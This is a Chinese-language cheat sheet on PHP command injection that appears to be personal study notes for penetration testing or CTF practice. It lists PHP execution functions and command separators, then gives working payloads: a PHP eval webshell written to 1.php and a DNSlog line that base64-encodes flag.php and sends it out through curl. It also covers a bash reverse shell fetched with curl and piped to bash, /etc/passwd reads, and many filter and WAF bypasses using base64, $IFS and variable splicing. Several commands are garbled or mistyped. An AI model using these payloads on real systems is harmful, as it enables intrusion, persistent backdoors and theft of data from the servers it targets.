PHP 命令执行

命令函数	作用	例子
system()	执行外部程序,并且显示输出	system('whoami')
exec()	执行一个外部程序	echo exec('whoami');
shell_exec()	通过shell环境执行命令,并且将完整的输出以字符串的形式返回	echo shell_exec('whoami');
passthru()	执行外部程序并且显示数据原始输出	passthru('whoami');
pcntl_exec()	在当前进程空间执行指定程序 不能在非unix平台	pcntl_exec("/bin/cat",array("/etc/passwd));
popen()	打开进程文件指针	$a=popen("bin/cat,/etc/passwd","r");$b=fread($a,2096);echo $b;pclose($a);
proc_open()	执行一个命令,并打开一个io文件指针.类似popen(),但更复杂.
ob_start()	打开内部缓冲 输出内部缓存ob_end_flush()	<?php ob_start("system"); echo "whoami"; ob_end_flush();?>
反引号``	echo `whoami`

命令执行常用命令

命令目的	linux	windows
当前用户名	whoami	whoami
操作系统	uname -a	ver
网络配置	ifconfig	ipconfig /all
网络连接	netstat -an	netstat -an
运行进程	ps -ef	tesklist

命令分隔符号linux ;可以用 |或 ||代替

;前面的执行完执行后面的

|是管道符,显示后面的执行结果

||当前面的执行出差时执行后面的

可以用**%0a和\n**换行执行命令

windows 不能用;可以用&,&&,|,||代替

&前面的语句为假则直接执行后面的

&&前面的语句为假则直接出错,后面的也不执行

|直接执行后面的语句

||前面的出错执行后面的

常用命令执行函数解析

1.system

system('whoami')
php会操纵计算机执行whoami的命令,且输出返回结果
目标:机器如果是linux执行的是bash命令|如果是windows执行的是cmd命令.
echp"<?php @eval($_REQUEST[8]);?>">1.php
tisp:echo"输入内容">1.php是指把内容写入1.php尖括号对于echo来说是关键词,所以用双引号括起来
得到的结果:
成功写入文件,但是写入的文件有""包围了起来那么是不是就代表是字符串不能用了
这里是<?php?>内的被""包围才会有影响所以说外面的双引号并不会影响到正常执行

2.echo exec

只会执行,如果有输出 显示结果的最后一行内容

3.echo shell_exec

只会执行,如果有输出 显示获得的所有数据

4.``[反引号]

shell_exec 特殊写法 禁用shell_exec就不可使用shell_exec

5.passthru

执行命令返回结果且输出跟system没有什么区别

6.popen(要执行的命令,参数) //r是只读 w是写入

$a =popen('whoami','r');
echofread($a,1024);
这个指的返回值比较特殊,返回的是一个文件指针,需要用fread去读取返回值长度 第二个指定输出多少个字符.

命令执行无回显利用技巧

1.延时

可以使用注入的命令来触发时间延迟,从而根据应用程序相应来确认命令是否执行
windows:echo1&ping-n10127.0.0.1&echo2
会ping检测10次产生延时

2.重定向输出

我们可以将注入命令的输出重定向到web根目录下的文件当中,然后使用浏览器进行检索.如果他会在localhost提供静态资源
绝对路径
cmd >file 输出重定向到file文件
cmd>file 输出追加到file中,无则创建
windows whoami >F:/PHPSTUDY/WWW/phpstudent/lynn.txt
可以将我们的命令执行后的结果输出到指定目录文件当中

3.DNSlog外带linux

利用域名解析请求,dnslog.cn
例如8qcijo.dnslog.cn那么因为dnslog使用了泛解析会将所有只要有8qcijo.dnslog.cn的xxx.8qcijo.dnslog.cn
curl`cat<flag.php|base64`.awa4xw.ceye.io

4.反弹shell

1.首先在服务器用nc监听端口
nc-lvp4444
2.如何在服务器上开启web访问(8000端口),写入一个文件(1.txt)内容如
bash-i&/dev/tcp/x.x.x.x/44440>&1
3.执行payload
?cmd=curl x.x.x.x:8000/1.txt|bash

python一行代码实现简易http服务器
python-m SimpleHTTPServer

命令执行定位文件

dir /s/b "文件内容"文件名称

findstr /s "文件内容"文件名称

命令执行绕过

1.拼接 linux

a=ca;b=t;c=1;$a$b $c.txt
设置变量
a=ca b=t c=1拼接执行 约等于cat 1.txt

2.base64编码linux

`echo "Y2F0IDEudHh0"|base64 -d`
或
echo"Y2F0IDEudHh0"|base64-d|bash
先将这串字符串base64解码然后bash执行命令

3.单引号,双引号linux

ca""t1''.txt
在linux里面单双引号不会影响命令执行

4.反斜杠 linux

c\at 1.t\xt
同上一样的效果

5.可变扩展绕过linux

test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm} == /etc/passwd
cat ${test//hh??hm/} == /etc/passwd

6.用通配符绕过windows

powershell C:\*\*2\n??e*d.*?|notepad

7.shell特殊变量

ca$@t 1$1.txt==cat 1.txt
c@$a$@t@$ 1$1.@$t@$x@$t

长度限制绕过

通过构造文件来绕过
linux下可以用
1>a 创建文件名为a的空文件
ls-t>test 则会将目录按时间排序后写进test文件中
sh可以从一个文件中读取命令来执行 例如一个文件里面写了 echo1那么着急sh文件名 即可输出1

空格绕过

1.cat</etc/passwd利用<指定命令可不使用空格

2.{cat,/etc/passwd}利用{}包裹代码用,当作分隔符去查看

3.cat$IFS/etc/passwd利用$IFS代替空格

4.echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd利用${IFS}当作空格使用&&(连接符)

windows平台

ping%CommonProgramFiles:~10,-18%IP地址|利用%CommonProgramFiles:~10,-18%

ping%PROGRAMFILES:~10,-5%IP地址|利用%PROGRAMFILES:~10,-5%

引号逃逸

当而已命令背括在引号内时,可以用\转义引号逃逸

不带反斜杠和斜杠的命令执行

echo ${HOME:0:1}|${HOME:0:1}代替/
例如:
cat ${HOME:0:1}etc${HOME:0:1}passwd

echo.|tr '!-0''"-1'=/
例如:
cat$(echo.|tr '!-0''"-1')etc$(echo.|tr '!-0''"-1')passwd

命令执行waf绕过

windows

1.符号于命令的关系

"和^还有成对的圆括号()符号并不会影响命令执行,在windows环境下,命令不会区分大小写